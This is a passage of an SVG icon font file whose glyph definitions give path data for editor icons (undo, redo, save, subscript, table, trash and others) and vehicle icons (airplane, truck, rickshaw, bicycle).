0-126 0-252 0-378 0-11-3-21-6-30-7-19-21-29-45-29-79 0-158 0-237 0l0 0z m-2 203c56 0 112 0 168 0 9 0 13-2 12-12-1-13 0-26 0-40 0-7-3-10-10-10-5 0-10 0-15 0-106 0-211 0-317 0-19 0-19 0-19 19 0 10 1 20 0 29-1 13 4 14 14 14 56 0 111 0 167 0v0h0z m-4 141c55 0 109 0 163 0 20 0 16 1 17-17 0-11-1-21 0-31 1-12-4-15-15-15-29 1-59 0-88 0h-241c-16 0-17 1-17 16 0 12 1 24 0 35-1 10 3 12 12 12 57-1 113 0 169 0z" />
<glyph glyph-name="redo" horiz-adv-x="1000" unicode="&#xedfe;" d="M597 465c-51 0-101 1-152 0-28 0-54-8-78-22-80-46-120-141-109-236 11-97 81-173 172-196 19-4 37-6 56-7 44-1 77-34 77-77 0-43-34-78-79-77-99 1-187 35-259 103-143 135-165 353-52 515 61 86 141 139 247 149 55 6 110 1 164 3 6 0 13-2 21 3-33 32-65 63-96 95-32 33-30 80 1 111 32 30 77 28 110-4 91-91 181-182 272-273 9-8 9-12 0-21-49-48-97-97-146-146-44-43-86-87-130-129-26-25-61-28-90-12-30 16-44 48-38 83 3 17 12 30 24 43 31 30 62 61 96 94-7 1-9 1-11 1z" />
<glyph glyph-name="rotation" horiz-adv-x="1000" unicode="&#xedff;" d="M1000 321c-5-21-8-43-16-64-38-109-144-185-259-185-30-1-55 20-58 48-3 30 15 57 44 62 17 3 34 2 50 6 67 18 111 61 124 128 13 71-7 133-67 178-17 13-37 21-58 21-40 1-81 1-122 1 0-6 5-8 7-11 21-20 41-40 61-60 22-24 22-58 0-80-22-21-56-21-78 1-67 66-133 133-200 199-6 6-5 8 0 13 67 66 133 133 199 199 8 9 19 12 30 18h20c1-3 4-3 6-3 42-15 53-62 22-94-7-8-14-14-21-21-16-16-31-31-49-49h16c34 0 69 0 103 0 25-1 50-5 74-14 81-32 131-92 159-174 6-19 8-40 13-59 0-20 0-40 0-60z m-634-137c-24 24-46 46-69 68-9 9-15 19-18 31-4 25 7 48 28 60 21 12 47 9 65-8 32-31 63-63 94-94 35-35 70-71 106-106 6-6 6-9 0-15-66-65-131-131-197-197-24-23-57-24-79-3-23 22-24 57-1 81 22 23 45 45 69 68-6 4-10 3-15 3-39 0-79-3-118 1-77 7-135 46-179 108-82 117-66 275 38 372 52 49 115 74 187 75 32 0 57-25 57-56 0-31-24-55-56-56-14 0-27-2-40-5-66-16-116-72-125-141-8-69 22-138 79-171 18-10 37-16 57-16 36 0 73 0 109 0 2 0 3 0 8 1z" />
<glyph glyph-name="save" horiz-adv-x="1000" unicode="&#xee00;" d="M2 348c0 137 0 273 0 410 0 67 21 89 91 89 31 0 62-2 93 0 25 2 30-8 29-30-1-75 1-149 0-223-1-25 6-33 32-33 169 1 338 2 507 0 26 0 32 10 31 34-1 68-1 136 0 204 0 16-9 40 8 45 22 6 51 13 72-6 42-39 82-81 124-122 11-11 9-24 9-37 0-251 0-501 0-752 0-50-27-76-77-77-279 0-558 0-836 0-59 0-84 27-84 85 0 138 0 276 0 413h1z m493-426v-1c109 0 217 1 325 0 24 0 37 1 37 32-2 144-1 288-1 431 1 26-6 37-34 36-215-1-429-1-644 0-28 1-35-10-35-36 1-143 1-287 0-431 0-25 7-32 33-32 106 2 213 1 319 1z m218 816c0-108 0-107-109-105-23 1-35 4-34 31 2 52 2 104 1 156-1 21 7 27 27 28 115 5 115 5 115-110z m-218-460c-81 0-162 0-244-1-24 0-39 2-37 33 1 25 3 40 35 40 169-2 338-2 507-1 29 0 29-13 29-35 0-23-1-38-32-37-86 2-172 1-258 1z m10-72c80 0 160 0 240 0 23 0 43 3 41-32 0-31-9-41-40-40-166 1-332 2-497 0-29 0-36 9-34 35 1 24 1 38 32 38 86-2 172-1 258-1z m0-142c80 0 159-1 239 0 29 1 41-4 42-37 1-39-19-35-44-35-161 1-322 1-484 0-25 0-44-3-44 35 0 34 14 38 42 37 83-1 166 0 249 0z" />
<glyph glyph-name="small-cap" horiz-adv-x="1000" unicode="&#xee01;" d="M7 523c0 43-2 96-7 160 57-2 154-3 290-3 137 0 233 1 290 3-5-64-7-117-7-160 0-27 1-51 3-72h-21c-11 53-24 94-39 124-14 31-32 53-53 66-21 13-47 20-77 20h-21v-537c0-26 2-45 8-57 5-11 15-20 28-24 14-4 35-6 64-7v-18c-79 1-138 2-178 2-40 0-97-1-172-2v18c29 1 51 3 64 7 14 4 23 13 28 24 6 12 8 31 8 57v537h-20c-31 0-56-7-77-20s-39-35-54-65c-15-30-28-72-39-125h-21c2 21 3 45 3 72z m617-174c0 28-1 63-4 105 37-1 101-2 190-2 90 0 153 1 190 2-3-42-4-77-4-105 0-17 0-33 2-47h-14c-7 35-16 62-25 82s-22 34-36 43c-14 8-30 13-50 13h-14v-352c0-17 2-30 5-38 4-7 10-13 19-16 9-2 23-4 42-4v-13c-52 2-91 2-117 2-26 0-64 0-113-2v13c19 0 33 2 42 4 9 3 15 9 19 16s5 21 5 38v352h-14c-20 0-36-5-50-13-14-9-26-23-36-43-9-20-18-47-25-82h-14c1 14 2 30 2 47z" />
<glyph glyph-name="strike-through" horiz-adv-x="1000" unicode="&#xee02;" d="M1000 319v63h-379v411h31c43 0 79-9 109-28 30-19 55-50 77-94 21-43 39-102 54-176h31c-3 29-5 63-5 102 0 61 3 136 10 227-81-3-218-4-413-4-194 0-332 1-413 4 6-91 9-166 9-227 0-39-1-73-4-102h31c15 75 33 134 54 177 22 43 47 75 77 93s67 28 110 28h29v-411h-408v-63h408v-291c0-37-4-64-11-81-7-17-21-28-40-34-20-6-50-10-92-10v-27c107 3 189 4 245 4 57 0 142-1 254-4v27c-41 0-71 4-91 10-19 6-33 17-40 34-8 17-12 44-12 81v291h379z" />
<glyph glyph-name="sub-listing" horiz-adv-x="1000" unicode="&#xee03;" d="M980 323h-451c0 0-1 0-2 0-9 0-17-16-17-35 0-24 0-48 0-72 0-9 1-16 4-23 4-10 9-13 16-13 150 0 300 0 450 0 1 0 2 0 3 0 4 1 8 4 11 9 3 5 5 12 6 20v85c0 0 0 0 0 1-4 20-9 28-20 28z m7 416c-4 3-9 5-14 6h-758c0 0-1-1-1-1-16-3-25-17-25-37v-68c0-3 0-5 0-8 2-14 14-29 30-29 250 0 500 0 750 0h2c7 0 13 3 18 8 6 6 9 13 11 22v83c-2 10-6 18-13 24z m-6-207h-452c-1 0-2 0-3 0-9-1-16-16-16-35 0-24 0-48 0-72 0-2 0-4 0-6 2-18 9-29 18-29h433c7 0 14 0 21 0 5 0 8 3 12 9 3 5 5 13 6 21v83c0 1 0 1 0 1-4 20-9 28-19 28z m-3-435h-448c-1 0-2 0-3 0-10 0-17-16-17-36 0-24 0-47 0-70 0-10 1-18 5-25 4-9 9-11 15-11 150 0 300 0 450 0 1 0 2 0 3 0 5 0 9 5 13 12 2 5 3 11 4 17v84c-5 23-9 29-22 29z m-905 636h-40c0-2-2-4-5-6s-6-5-10-7c-3-2-6-3-10-5-3-1-6-2-8-2v-36c3 0 6 0 9 1 3 1 7 2 10 4 3 1 6 2 9 4s4 3 5 5v-41h-29v-35h96v35h-27v83z m270-260c-5 1-10 1-15 1-6 0-13-1-18-2s-11-4-15-7c-4-3-7-7-9-11-3-5-4-10-4-15 0-5 1-9 3-13 2-4 4-8 8-11s7-6 12-7c4-2 9-3 14-3 8 0 15 2 22 5 7 3 13 8 18 14l1-6c0-3 2-6 5-9s6-3 12-3c1 0 3 0 6 0 2 0 4 1 7 1v24c-3 0-5 0-6 2s-2 3-2 6v34c0 14-4 25-12 33-9 8-21 11-37 11-16 0-31-4-45-13l9-18c6 4 11 7 17 9s11 3 17 3c8 0 14-2 18-6s6-9 6-16v-6c-4 1-8 2-12 3z m12-31c0-3-2-5-5-8-2-2-5-5-10-6s-8-3-13-3c-5 0-10 2-13 5-4 3-5 7-5 12 0 5 2 9 6 12s11 5 18 5c3 0 7-1 11-1 4-1 8-2 11-3v-13h0z m34-171c-5 5-10 9-15 12s-13 4-20 4c-8 0-15-1-22-5-6-4-11-9-15-15v61h-28v-151h25v19c3-6 9-12 15-15 6-4 14-6 22-6 7 0 14 2 20 4s12 7 16 12c5 5 8 11 11 18s4 14 4 22c0 8-1 15-4 22-2 7-5 13-9 18z m-18-53c-1-4-3-7-6-10s-6-5-9-7c-4-1-8-2-13-2-2 0-5 0-8 1s-5 2-7 4c-3 1-5 3-7 5-1 3-3 5-4 8v26c3 6 7 11 11 15 5 4 11 6 17 6 4 0 8-1 11-3s7-4 9-7c3-3 5-7 6-11 2-4 2-8 2-12s0-9-2-13z m-18-221c-4-2-8-4-13-4-4 0-8 1-11 3-4 1-7 4-9 7s-5 6-6 10c-2 4-3 8-3 13 0 5 1 9 3 13s3 8 6 11c2 2 5 5 9 6s7 3 11 3c4 0 9-2 13-4s7-5 9-9l27 8c-4 9-10 15-19 20s-18 8-30 8c-9 0-17-1-24-4-7-3-13-8-18-13s-9-11-11-17c-3-7-4-14-4-22 0-7 1-15 4-21s6-13 11-18c5-6 11-10 18-13s15-4 24-4c12 0 22 2 31 8s15 12 18 20l-27 8c-1-3-4-6-9-9z" />
<glyph glyph-name="subscript" horiz-adv-x="1000" unicode="&#xee04;" d="M296 538c37 60 74 120 110 179 4 8 9 10 17 10 49 0 98 0 146 0 9 0 11-2 11-11-1-29-1-59 0-89 0-8-3-10-11-10-21 0-42 0-63 0-5 0-9-1-12-6-37-54-74-109-112-163-3-4-2-7 1-11 41-60 83-121 124-181 3-5 7-7 13-6 18 0 36-1 54 0 7 0 9-2 9-9-1-31-1-61 0-91 0-7-1-10-9-10-49 1-97 1-146 0-5 0-8 2-11 6-41 67-84 131-124 200-5-10-9-20-15-29-35-57-70-113-105-170-3-5-7-7-13-7-50 1-99 1-149 0-9 0-11 3-11 11 1 29 1 59 0 88 0 8 2 11 11 11 21-1 43 0 65 0 6-1 9 1 13 6 39 59 79 118 119 177 4 6 3 9 0 14-38 54-75 109-111 163-4 6-8 7-14 7-24 0-48 0-71 0-8 0-10 2-10 10 1 30 1 60 0 91 0 7 2 9 9 9 55 0 110 0 164 0 6 0 9-2 12-6 36-61 74-121 109-183z m536-565c-52 0-105 1-157 0-9 0-12 3-13 11-8 58 2 111 42 156 21 23 48 41 74 59 18 13 38 25 57 37 15 11 29 22 40 37 27 39 8 84-39 91-37 6-65-10-89-36-2-2-5-5-7-8-3-4-5-4-9-1-20 18-40 35-60 53-3 2-3 5 0 8 34 44 77 73 133 79 42 6 83 1 121-20 80-46 80-145 43-199-23-35-57-58-91-79-26-16-54-31-77-51-13-12-25-24-31-42-3-8-3-12 8-12 43 0 86 0 129 0 9 0 12 2 11 11 0 10 1 21 0 32 0 7 2 10 10 9 21 0 42 0 63 0 8 1 10-2 10-9 0-39 0-77 0-116 0-8-2-10-10-10-53 1-105 0-158 0z" />
<glyph glyph-name="superscript" horiz-adv-x="1000" unicode="&#xee05;" d="M574 44c-18 0-36 0-54 0-6 0-9 2-13 7-41 60-83 120-124 180-3 4-4 7-1 12 38 54 75 108 112 162 4 5 7 7 12 7 21-1 42 0 63-1 9 0 11 2 11 11 0 30 0 59 0 89 0 9-2 11-11 11-48-1-97-1-146 0-8 0-12-3-17-10-36-60-73-119-110-180-34 63-73 123-109 184-3 4-6 5-11 5-55 0-110 0-165 1-7 0-9-3-9-10 1-30 1-60 0-91 0-7 2-10 10-10 23 1 47 0 71 1 6 0 10-2 14-7 36-55 73-109 111-164 3-4 4-8 0-13-40-59-80-118-119-177-4-5-7-7-13-7-22 0-44 0-65 0-9 1-11-2-11-10 1-30 1-59 0-88 0-9 2-11 11-11 50 0 99 0 149 0 6 0 10 1 13 7 35 56 70 113 105 169 6 10 10 19 15 29 40-68 83-133 124-199 3-5 6-6 11-6 49 0 97 0 146 0 8 0 9 2 9 9-1 30-1 61 0 91 0 7-2 10-9 9z m426 359c0 7-2 10-10 9-21 0-42 0-63 0-8 1-10-2-10-9 1-11 0-22 0-32 1-9-2-11-11-11-43 0-86 0-129 0-11 0-11 4-8 13 6 17 18 29 31 41 23 20 51 35 77 51 35 22 68 44 92 79 36 54 36 154-44 199-38 21-79 26-121 21-56-7-99-36-133-80-3-3-3-5 0-8 21-18 41-35 61-53 3-3 5-3 8 1 2 3 5 6 7 9 25 25 52 41 89 35 47-7 66-52 39-90-11-16-25-27-40-37-19-13-39-25-57-38-26-18-52-36-74-59-40-45-50-97-42-155 1-9 4-11 13-11 52 0 105 0 157 0s105 0 158 0c8 0 10 2 10 10 0 38 0 76 0 115z" />
<glyph glyph-name="table" horiz-adv-x="1000" unicode="&#xee06;" d="M0 789v-878h1000v878h-1000z m961-39v-49h-922v49h922z m-548-429v160h165v-160h-165z m165-29v-163h-165v163h165z m-193 29h-162v160h162v-160z m221 160h162v-160h-162v160z m0 28v163h162v-163h-162z m-28 0h-165v163h165v-163z m-193 0h-162v163h162v-163z m-191 0h-155v163h155v-163z m0-28v-160h-155v160h155z m0-189v-163h-155v163h155z m29 0h162v-163h-162v163z m162-191v-151h-162v151h162z m28 0h165v-151h-165v151z m193 0h162v-151h-162v151z m0 28v163h162v-163h-162z m191 163h164v-163h-164v163z m0 29v160h164v-160h-164z m0 188v163h164v-163h-164z m-758-408h155v-151h-155v151z m758-151v151h164v-151h-164z" />
<glyph glyph-name="text-height" horiz-adv-x="1000" unicode="&#xee07;" d="M348 745c-164 0-279 1-348 4 6-77 8-140 8-192 0-32-1-60-4-85h26c13 63 28 112 46 149 18 36 40 62 65 78 25 16 56 24 92 24h25v-643c0-31-3-54-10-68-6-15-17-24-33-29-17-6-42-8-78-9v-22c90 2 159 3 206 3 48 0 120-1 214-3v22c-35 1-60 3-77 9-16 5-27 14-34 29-6 14-9 37-9 68v643h26c35 0 66-8 91-24 25-16 47-42 65-79 18-36 33-86 45-148h26c-3 25-4 53-4 85 0 52 3 115 8 192-67-3-183-4-346-4z m625-682c-17-17-33-34-49-51-2-1-4-4-5-6l-2 2v7c0 43 0 86 0 128l0 1v179c-5-2-10-4-16-4s-11 2-16 4v-180l0 0c1-42 0-84 0-126v-11c-2 3-4 4-6 6-17 17-33 34-50 51-6 6-12 7-19 4-6-4-9-9-8-16 1-4 3-7 5-10 28-28 55-56 83-84 6-7 16-7 23 0 27 28 54 56 82 84 7 7 7 17 0 23-6 6-15 6-22-1z m-163 571c7-4 13-2 19 4 17 16 33 33 50 50 2 2 3 4 6 6v-11c0-42 0-83 0-125l0-1v-180c5 3 10 5 16 5s11-2 16-5v180l0 0c0 43 0 85 0 128v8l2 1c1-2 3-4 5-6 16-17 32-34 49-50 7-7 16-8 22-1 7 6 7 15 0 23-28 28-55 55-82 83-7 7-17 7-23 1-28-29-55-57-83-85-2-2-4-5-5-9-1-7 2-13 8-16z m110-284c0-10-9-19-19-19s-19 9-19 19c0 11 9 19 19 19s19-8 19-19z" />
<glyph glyph-name="text-width" horiz-adv-x="1000" unicode="&#xee08;" d="M175 587h25c12 60 26 107 43 142 17 34 38 59 62 74 23 15 53 23 87 23h23v-610c0-30-3-51-9-65-5-13-16-22-32-27-15-5-39-8-73-8v-21c86 2 151 3 196 3 45 0 113-1 202-3v21c-33 0-57 3-72 8-16 5-27 14-33 27-6 14-9 35-9 65v610h25c34 0 63-8 86-23 24-15 45-40 62-75s31-81 43-141h24c-2 24-3 51-3 82 0 48 2 109 7 181-64-2-173-3-328-3s-265 1-330 3c5-72 8-133 8-181 0-31-1-58-4-82z m570-554c-7 6-15 7-21 1-7-7-6-15 1-22 15-16 31-31 47-47 2-1 4-3 6-4l-1-2h-251c3-5 4-10 4-15 0-5-1-11-4-15h123c39 0 79 0 119 0h10c-2-3-4-4-6-6-16-16-32-31-47-47-6-6-7-12-4-18 3-6 8-8 15-8 4 1 6 2 9 5 27 26 53 52 80 78 6 6 6 16 0 22-27 26-53 52-80 78z m-270-74h-122c-41-1-81 0-122 0h-7l-1 2c2 1 4 3 6 4 15 16 31 31 47 47 7 7 7 15 1 21-6 6-15 6-22 0-26-26-53-52-79-78-7-7-7-16 0-22 26-26 53-52 80-78 2-3 5-5 9-5 6-1 12 2 15 8 3 6 2 12-4 18l-48 47c-1 1-3 3-6 6h253c-3 4-4 9-4 15 0 5 1 10 4 15z m43-15c0-10-8-18-18-18s-18 8-18 18 8 18 18 18 18-8 18-18z" />
<glyph glyph-name="trash" horiz-adv-x="1000" unicode="&#xee09;" d="M845 617c-115-1-230-1-345-1v0h-346c-12 0-23 2-20-17 17-108 33-215 50-323 16-107 35-213 48-319 7-56 54-108 118-107 99 2 198 0 298 0 66 1 109 39 119 105 20 133 40 266 60 399 12 80 24 161 37 241 3 19-3 22-19 22z m-317-150c-1-161 0-322 0-483h-56c0 81 0 161 0 241h1c0 82 0 165-1 247 0 3 0 5 0 7h55c1-4 1-7 1-12z m-289 12h55c1-4 2-9 3-14 14-114 30-227 46-341 6-46 14-93 19-140h-55c-15 108-30 216-45 324-8 56-15 113-23 169l0 2z m494-200c-14-98-29-196-41-295h-55c23 162 44 324 66 485 1 3 1 7 1 10h57c-1-4-2-9-2-12-9-63-18-126-26-188z m209 413c-11 26-29 47-49 66-21 21-45 33-77 33-61-2-122 0-182-1-14 0-21 2-25 17-8 30-28 43-59 43-34 0-68 0-102 0-30 0-50-14-58-43-4-14-10-18-24-17-61 1-122 1-182 0-54 0-117-53-129-105-4-17 2-26 18-29 8-1 16-1 23-1 134 0 268 0 402 0h182l185 0c18 0 36-1 54 1 25 1 32 14 23 36z" />
<glyph glyph-name="underline" horiz-adv-x="1000" unicode="&#xee0a;" d="M148 556h28c14 67 30 119 49 158s42 67 69 83c26 17 59 26 98 26h26v-684c0-33-3-57-10-73-7-15-19-25-36-31-17-5-45-8-82-8v-24c96 2 169 3 219 3 51 0 127-1 227-3v24c-37 0-64 3-81 8-17 6-29 16-36 31-7 16-10 40-10 73v684h27c38 0 71-9 97-26 27-17 50-45 69-83 19-39 35-92 48-158h28c-3 26-4 56-4 91 0 54 3 122 9 203-73-2-195-3-369-3s-297 1-370 3c6-81 9-149 9-203 0-35-2-65-5-91z m-95-650h894v-56h-894v56z" />
<glyph glyph-name="undo" horiz-adv-x="1000" unicode="&#xee0b;" d="M898 195c-7-29-11-60-22-88-53-151-200-256-358-257-42 0-76 29-80 67-5 41 21 78 60 86 23 4 47 2 70 8 92 25 153 84 171 177 18 99-10 184-93 247-23 17-51 28-80 29-56 1-112 0-169 0 1-7 7-10 11-14 27-28 56-56 83-84 31-32 31-79 0-110-29-29-77-30-108 1-92 92-184 184-276 276-8 7-7 11 0 18 92 91 184 183 275 275 12 12 27 17 41 24h29c1-3 4-3 7-4 58-21 74-86 31-130-9-10-19-20-29-29-22-21-43-43-68-68h23c47 0 94 1 142 0 35-1 69-6 102-19 113-44 182-128 220-240 9-27 11-55 18-82 0-28 0-55 0-83z" />
<glyph glyph-name="air-balloon" horiz-adv-x="1000" unicode="&#xee0c;" d="M784 481c-16 0-31 1-46 0-13 0-18-4-19-14 0-11 6-16 18-16 12-1 23 0 35-1 10 0 10 0 8-10-9-42-31-78-56-112-31-41-64-81-94-122-15-20-26-43-39-65-3-5-4-11-12-12-1 0-4-4-4-6-3-23-6-45-8-67-1-2-1-5-1-7-2-12-2-12 9-14 2-1 6-4 6-7 0-36 0-72 0-108 0-6-3-7-8-7-45 0-90 0-135 0-5 0-8 2-8 7 1 36 1 72 0 107 0 6 2 8 8 8 6 0 7 4 6 9-3 26-5 51-8 77 0 5-2 8-8 9-2 0-6 3-7 6-19 41-46 75-76 109-28 33-56 65-83 98-22 28-35 59-42 94-1 2-1 4-1 6-1 2 0 4 0 7 3 0 7 0 10 0 13 0 25 0 37 1 9 0 16 8 16 16-1 8-7 14-17 14-13 1-27 1-41 0-6 0-9 3-8 9 6 90 38 167 105 228 39 35 85 58 137 66 50 8 98 2 145-18 75-33 125-88 156-163 15-35 23-72 25-110 0-3 0-7 0-12z m-241-398c0 13 0 25 0 38 0 7-1 9-8 9-20 0-40 0-61 0-7 0-9-3-9-10 0-25 0-51 0-76 0-7 2-9 9-9 20 0 40 0 61 0 7 0 9 2 8 9 0 13 0 26 0 39z m23 418c12 0 25 0 37 1 10 0 17 6 17 15 0 9-7 16-17 16-24 0-48 0-72 0-10 0-17-7-17-16 0-9 7-15 18-15 11-1 23-1 34-1z m136 0c12 0 24 0 36 1 11 0 17 6 17 15 0 10-7 16-17 16-24 0-48 0-72 0-10 0-17-7-17-16 1-9 7-15 18-15 12-1 23-1 35-1z m-406 0c12 0 24 0 36 0 11 1 16 6 17 15 0 10-6 16-16 17-24 0-49 0-73 0-10 0-16-7-16-16 0-10 6-15 17-16 11 0 23 0 35 0z m338-20c-12 0-24 1-36 0-10 0-16-6-16-15-1-8 6-15 15-15 25-1 50-1 75 0 10 0 15 6 15 15 0 10-6 15-16 15-12 1-25 0-37 0z m-203 20c12 0 23 0 35 0 12 1 18 6 18 16 0 10-6 16-18 16-23 0-46 0-68 0-12 0-19-7-19-16 0-10 7-15 18-16 11 0 23 0 34 0z m68-20c-11 0-23 1-34 0-11 0-19-6-19-15 0-8 7-15 17-15 24-1 49-1 73 0 11 0 17 7 16 16 0 9-6 14-17 15-12 0-24-1-36-1z m-134 0c-12 0-24 1-36 0-4 0-8-1-12-3-6-4-6-10-5-17 2-8 9-11 17-11 23 0 47 0 70 0 12 0 17 6 17 16 0 10-5 15-17 15-11 1-23 0-34 0z m184-399c0-12-1-25 0-38 0-3 3-6 4-9 2 3 6 5 6 8 4 26 7 52 10 78 1 6 0 9-7 9-6-1-14 2-13-9 0-13 0-26 0-39z m-89 0c0 13 0 27 0 40 0 9-6 7-12 8-6 0-7-3-7-9 3-26 6-52 8-78 1-3 4-5 6-8 1 3 4 6 5 8 0 13 0 26 0 39z" />
<glyph glyph-name="airplane-alt" horiz-adv-x="1000" unicode="&#xee0d;" d="M810 767l-149-154c-10-10-30-15-43-10l-322 105c-14 5-34 0-44-10l-84-84c-10-10-8-24 6-30l294-135c13-6 15-19 5-30l-198-205c-3-2-6-5-8-8-4-4-18-3-31 3l-92 43c-14 6-33 2-43-8l-23-23c-11-11-9-25 3-33l117-72c12-8 31-22 41-33l4-3c10-11 25-29 33-41l78-116c8-13 23-14 33-4l19 19c11 11 14 30 8 43l-56 120c-6 13-9 25-6 27 2 2 3 3 5 4l209 203c10 10 20 18 21 17 1-1 7-13 13-26l155-306c6-13 20-16 30-5l75 75c11 10 15 30 11 43l-118 348c-5 14-9 25-9 25s8 9 19 19l146 143c28 27 28 72 0 99-27 27-72 27-99 0z" />
<glyph glyph-name="airplane" horiz-adv-x="1000" unicode="&#xee0e;" d="M937 150c0 42 1 81 0 120 0 5-6 10-10 14-114 91-228 182-342 272-11 8-16 17-15 31 1 33 0 67 0 100 0 43-30 74-70 74h0c-40 0-69-31-70-74 0-33-1-67 0-100 1-14-4-23-15-31-114-90-228-181-342-272-4-4-10-9-10-14-1-39 0-78 0-120l367 186c0-70 0-137 0-203 0-6-6-12-10-16-37-30-75-60-112-90-4-3-10-7-10-11-1-25 0-49 0-77 50 20 98 39 147 58 0-31 25-57 55-57s55 26 56 57c48-19 96-38 147-58 0 28 0 52-1 77 0 4-6 8-9 11-38 30-75 60-112 90-5 4-10 10-10 16-1 66-1 133-1 203 123-62 244-123 367-186z" />
<glyph glyph-name="articulated-truck" horiz-adv-x="1000" unicode="&#xee0f;" d="M255 228c-61 0-109-49-109-109 0-60 48-109 109-109s109 49 109 109c0 61-49 109-109 109z m0-145c-20 0-36 16-36 36 0 20 16 36 36 36 20 0 36-16 36-36 0-20-16-36-36-36z m661 139c3 0 6 2 6 5v153c0 3-1 8-3 10l-60 93c-2 2-6 4-9 4h-219c-3 0-6-2-6-5v-212c0-3 3-6 6-5 5 0 14 1 30 1 63 0 97-30 115-54 1-3 4-3 7-1 8 7 18 11 30 11h103z m-160 93c-3 0-6 3-6 6v114c0 3 3 5 6 5h82c3 0 7-2 9-4l25-41c2-2 3-7 3-10v-64c0-3-2-6-5-6h-114z m-167-58c2 1 5 4 5 7v249c0 3 2 6 5 6h264c3 0 7 2 9 4l39 54c2 2 1 4-2 4h-341c-3 0-6-2-8-5l-38-84c-1-2-5-5-8-5h-446c-3 0-5-2-5-5v-52c0-3 2-5 5-5h36c3 0 5-3 5-6l0-82c0-4 2-6 5-7 37-8 248-56 285-166 1-3 4-5 7-5h107c3 0 6 2 7 5 4 18 22 73 69 93z m333-67h-109c-8 0-14-5-15-12-1-1-1-2-1-3v-32c0-8 7-15 16-15h109c9 0 16 7 16 15v32c0 8-7 15-16 15z m-156-39c-14 45-56 77-105 77-60 0-109-49-109-109 0-60 49-109 109-109 61 0 110 49 110 109l-1 4c0 10-2 20-4 28z m-105-68c-20 0-36 16-36 36 0 20 16 36 36 36s36-16 36-36c0-20-16-36-36-36z m-174 436c3 0 6 2 8 5l29 59c1 3 1 8 0 11l-12 29c-1 3-5 5-8 5h-35c-4 0-7 2-9 5l-35 53c-2 2-6 5-9 5h-49c-3 0-7-2-9-5l-58-69c-2-3-6-5-9-5h-38c-3 0-7-1-9-4l-37-39c-2-2-6-4-9-4h-23c-3 0-7-1-10-3l-44-40c-2-2-1-3 2-3l364 0z" />
<glyph glyph-name="auto-mobile" horiz-adv-x="1000" unicode="&#xee10;" d="M937 381l-10 31c-5 18-23 31-39 31h-36c-28 82-61 180-71 204-15 35-63 52-89 60 0 0-44 17-192 17l-192-17c-30-11-74-27-91-62-8-16-42-118-69-202h-36c-16 0-33-13-39-31l-10-31c-5-17 54-31 54-31-4-14-7-23-7-23-3-5-5-28-5-34v-285c0-18 14-33 31-33h114c17 0 31 15 31 33v61h439v-61c0-18 13-33 30-33h114c17 0 31 15 31 33v285c0 6-2 29-5 34 0 0-2 9-7 23 0 0 60 14 54 31z m-668 226c3 11 8 42 176 47 3-7 9-12 17-12h66c7 0 14 6 16 13 179-5 184-41 185-42 7-22 34-88 56-182 0 0-94-34-285-34-191 0-285 34-285 34 23 102 48 160 54 176z m11-400h-47c-42 0-84 6-84 35v34c0 33 18 34 38 34 19 0 57-17 82-29 27-13 57-23 57-45 0-20-11-29-46-29z m253 11h-76c-10 0-17 7-17 17 0 10 7 18 17 18h76c9 0 17-8 17-18 0-10-8-17-17-17z m318 24c0-15-10-24-26-29-16-5-37-6-58-6h-47c-35 0-46 9-46 29 0 22 31 32 58 45 25 12 63 29 81 29 20 0 38-1 38-34l0-34z" />
<glyph glyph-name="auto-rickshaw" horiz-adv-x="1000" unicode="&#xee11;" d="M909 252c9-6 18-7 28-6-5 28-23 43-46 55-22 11-46 16-70 11 0 11 7 14 16 16 22 3 22 3 22 26 0 19 0 19-16 25-4 15-6 31-10 45-20 62-54 116-90 168l-23 31c-16 23-39 31-65 31-73-1-146 0-219-1-65 0-129 0-194-2-34-1-68-9-98-27-42-24-65-60-65-112 1-39 0-79 0-119v-11h254v194c0 18 6 23 23 23 42 0 85 0 128 0 18 0 24-7 24-25 0-116 0-232 0-347 0-7 0-13-1-19-3-13-8-17-21-17-26 0-51 0-77 0-16 0-27 12-28 28-1 15-2 30-4 44-3 21-7 43-23 58-12 12-22 24-22 42h-253v-39c-6-2-11-3-16-4v-42c17-5 17-5 17-24v-107h634c0 4 1 7 1 10 14 104 121 143 194 95z m-243 166c-16 0-33 0-49 0-17 0-34 0-50 0-13 0-21 8-23 20-1 7 0 14 0 21 0 39 0 78 0 117 0 17 5 23 22 23 28 0 56 0 84 0 13 0 24-6 25-23 4-44 9-88 14-132 1-17-7-26-23-26z m60 33c-8 42-16 84-23 126-2 10 7 21 17 20 2 0 5-2 6-4 32-44 59-90 81-140 0-1 0-2 0-4-21-4-41-8-62-12-9-2-17 4-19 14z m115-197c-60 4-103-46-104-97-5-57 37-107 96-110 51-4 99 35 104 95 5 59-37 109-96 112z m-4-137c-18-1-33 14-33 33 0 19 14 34 32 34 18 1 33-15 33-33 0-19-14-34-32-34z m-629-21c-18 0-32 14-32 32h-65c2-42 49-81 95-82 47-1 94 38 99 82h-66c0-18-14-32-31-32z" />
<glyph glyph-name="bicycle-alt-1" horiz-adv-x="1000" unicode="&#xee12;" d="M751 441c-33 0-63-9-90-23l-50 72 28 119h-103v-37h58l-13-54h-247l20 78h64v37h-169v-37h68l-40-158c-9 2-18 3-28 3-103 0-186-84-186-187 0-103 83-186 186-186 103 0 187 83 187 186 0 81-52 150-124 176l15 58 200-252h38c10-94 89-168 186-168 103 0 187 83 187 186 0 103-84 187-187 187z m-351-187c0-83-68-150-151-150-83 0-150 67-150 150 0 83 67 151 150 151 7 0 13-1 19-1l-36-145 35-9 36 145c56-22 97-77 97-141z m252 113l65-95h-115c4 38 23 71 50 95z m-125-73l-150 188h195l-45-188z m32-22l41 171 31-46c-36-30-61-75-66-125h-6z m192-168c-77 0-140 58-149 132h183l-104 152c21 11 45 17 70 17 83 0 150-68 150-151 0-83-67-150-150-150z" />
